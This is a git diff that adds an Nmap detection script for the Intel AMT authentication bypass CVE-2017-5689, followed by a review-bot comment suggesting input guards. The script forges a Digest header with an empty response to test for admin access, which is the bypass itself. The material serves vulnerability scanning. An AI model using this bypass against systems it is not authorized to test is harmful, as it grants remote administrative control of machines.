diff --git a/CHANGELOG b/CHANGELOG
index 0e54dfeaa..266721e80 100644
--- a/CHANGELOG
+++ b/CHANGELOG
@@ -1,5 +1,9 @@
 # Nmap Changelog ($Id$); -*-text-*-
+o [NSE][GH#876] New script http-vuln-cve2017-5689 detects a privilege escalation
+ vulnerability (INTEL-SA-00075) in Intel Active Management Technology (AMT)
+ capable systems. [Andrew Orr]
+
 o Extended Memcached service probe and added match for Apache ZooKeeper.
 [Paulino Calderon]
diff --git a/scripts/http-vuln-cve2017-5689.nse b/scripts/http-vuln-cve2017-5689.nse
new file mode 100644
index 000000000..baf43c792
--- /dev/null
+++ b/scripts/http-vuln-cve2017-5689.nse
@@ -0,0 +1,125 @@
+description = [[
+Detects if a system with Intel Active Management Technology is vulnerable to the INTEL-SA-00075
+privilege escalation vulnerability (CVE2017-5689).
+
+This script determines if a target is vulnerable by attempting to perform digest authentication
+with a blank response parameter. If the authentication succeeds, a HTTP 200 response is received.
+
+References:
+* https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability
+]]
+
+local string = require "string"
+local http = require "http"
+local shortport = require "shortport"
+local vulns = require "vulns"
+local stdnse = require "stdnse"
+
+---
+-- @usage
+-- nmap -p 16992 --script http-vuln-cve2017-5689
+--
+-- @output
+-- PORT STATE SERVICE REASON
+-- 16992/tcp open amt-soap-http syn-ack
+-- | http-vuln-cve2017-5689:
+-- | VULNERABLE:
+-- | Intel Active Management Technology INTEL-SA-00075 Authentication Bypass
+-- | State: VULNERABLE
+-- | IDs: CVE:CVE-2017-5689 BID:98269
+-- | Risk factor: High CVSSv2: 10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)
+-- | Intel Active Management Technology is vulnerable to an authentication bypass that
+-- | can be exploited by performing digest authentication and sending a blank response
+-- | digest parameter.
+-- |
+-- | Disclosure date: 2017-05-01
+-- | References:
+-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689
+-- | https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr
+-- | http://www.securityfocus.com/bid/98269
+-- | https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf
+-- | https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability
+-- |_ https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability
+--
+-- @xmloutput
+--
+-- Intel Active Management Technology INTEL-SA-00075 Authentication Bypass
+-- VULNERABLE
+--
+-- CVE:CVE-2017-5689
+-- BID:98269
+--
+--
+-- 10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)
+--
+--
+-- Intel Active Management Technology is vulnerable to an authentication bypass that can be
+-- exploited by performing digest authentication and sending a blank response digest parameter.
+--
+--
+--
+--
+-- 05
+-- 01
+-- 2017
+--
+--
+-- 2017-05-01
+--
+-- https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr
+-- https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf
+-- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689
+-- https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability
+-- https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability
+-- http://www.securityfocus.com/bid/98269
+--
+--
+---
+
+author = "Andrew Orr"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = { "vuln", "auth", "exploit" }
+
+portrule = shortport.port_or_service({623, 664, 16992, 16993, 16994, 16995}, "amt-soap-http")
+
+action = function(host, port)
+ local vuln = {
+ title = "Intel Active Management Technology INTEL-SA-00075 Authentication Bypass",
+ state = vulns.STATE.NOT_VULN,
+ risk_factor = "High",
+ scores = {
+ CVSSv2 = "10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)",
+ },
+ description = [[
+Intel Active Management Technology is vulnerable to an authentication bypass that
+can be exploited by performing digest authentication and sending a blank response
+digest parameter.
+ ]],
+ IDS = {CVE = "CVE-2017-5689", BID = "98269"},
+ references = {
+ 'https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr',
+ 'https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability',
+ 'https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf',
+ 'https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability'
+ },
+ dates = { disclosure = { year = '2017', month = '05', day = '01' } }
+ }
+
+ local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+ local response = http.get(host, port, '/index.htm')
+
+ if response.header['server'] and response.header['server']:find('Intel(R) Active Management Technology', 1, true)
+ and response.status and response.status == 401 then
+ local www_authenticate = http.parse_www_authenticate(response.header['www-authenticate'])
+ local auth_header = string.format("Digest username=\"admin\", realm=\"%s\", nonce=\"%s\", uri=\"index.htm\"," ..
+ "cnonce=\"%s\", nc=1, qop=\"auth\", response=\"\"", www_authenticate[1]['params']['realm'],
+ www_authenticate[1]['params']['nonce'], stdnse.generate_random_string(10))
+ local opt = { header = { ['Authorization'] = auth_header } }
+ response = http.get(host, port, '/index.htm', opt)
+ if response.status and response.status == 200 then
+ vuln.state = vulns.STATE.VULN
+ end
+ end
+
+ return vuln_report:make_output(vuln)
+end
diff --git a/scripts/script.db b/scripts/script.db
index 6912af718..f9ee1a7ed 100644
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -263,6 +263,7 @@ Entry { filename = "http-vuln-cve2014-8877.nse", categories = { "exploit", "intr
 Entry { filename = "http-vuln-cve2015-1427.nse", categories = { "intrusive", "vuln", } }
 Entry { filename = "http-vuln-cve2015-1635.nse", categories = { "safe", "vuln", } }
 Entry { filename = "http-vuln-cve2017-5638.nse", categories = { "vuln", } }
+Entry { filename = "http-vuln-cve2017-5689.nse", categories = { "auth", "exploit", "vuln", } }
 Entry { filename = "http-vuln-misfortune-cookie.nse", categories = { "exploit", "intrusive", "vuln", } }
 Entry { filename = "http-vuln-wnr1000-creds.nse", categories = { "exploit", "intrusive", "vuln", } }
 Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } }
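Review bot: In `action`, the result of `http.parse_www_authenticate` is dereferenced as `www_authenticate[1]['params']['realm']` and `['nonce']` without any check, so a 401 from a host whose WWW-Authenticate header is absent, unparsable, or whose first challenge is not a Digest challenge carrying both parameters aborts the script with an index or format error instead of reporting NOT_VULN. Guard the parsed challenge before building the header and leave with a debug message when it is unusable, as below. Two smaller points on the forged header on the same lines: the Digest `uri` value is `"index.htm"` while the request target is `/index.htm`, and `nc=1` is not the 8-hex-digit nonce count the Digest scheme specifies; detection evidently does not depend on either, but `uri=\"/index.htm\"` and `nc=00000001` make the probe a well-formed Digest request.
```lua
    local www_authenticate = http.parse_www_authenticate(response.header['www-authenticate'])
    local challenge = www_authenticate and www_authenticate[1]
    local params = challenge and challenge['params']
    if not (params and params['realm'] and params['nonce']) then
      stdnse.debug1("No usable Digest challenge in WWW-Authenticate header; not probing")
      return vuln_report:make_output(vuln)
    end
    -- … unchanged: build auth_header from params['realm'] / params['nonce'], re-request, set state …
```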